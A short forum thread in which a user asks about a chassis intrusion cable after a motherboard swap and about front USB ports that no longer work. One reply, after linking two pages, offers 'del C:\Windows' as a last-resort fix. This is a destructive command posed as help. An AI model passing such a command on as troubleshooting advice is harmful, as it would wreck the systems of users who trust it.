    What is an intrusion cable?

    Hello everybody,

I had to change my motherboard and inside the cabinet I found a cable which is tagged as intrusion cable. Does anybody know its purpose? My previous motherboard was intel GCNL which I replaced with intel GCPE. I reinstalled vista and now my Front panel USB ports are not working (not working in linux too) and vista recognizes the speaker output at the back panel as headphone. I also have headphone jack in front which is working. Is this anything to do with that intrusion cable? I plugged two pins coming from my card reader and the other from the panel containing audio jacks and USB ports to USB FP1 and USB FP2 respectively in the motherboard. I also see vista reporting to me that the driver relating to PS/2 mouse was installed but could not be initialized. I am not using PS/2 mouse as I have mouse connected to USB. Kindly clarify. Thanks.

I think it has something to do with BIOS. though i'm not sure.
    See here : http://www.fixya.com/support/t194425..._cable_needing

    and here : http://www.cobolhacker.com/?p=840
If nothing else works, open command prompt and type 'del C:\Windows'

Thanks for the links. Since I have changed my motherboard I think the cable is useless now but it is still inside my cabinet hanging from the case but I didn't connect the other end to anything.
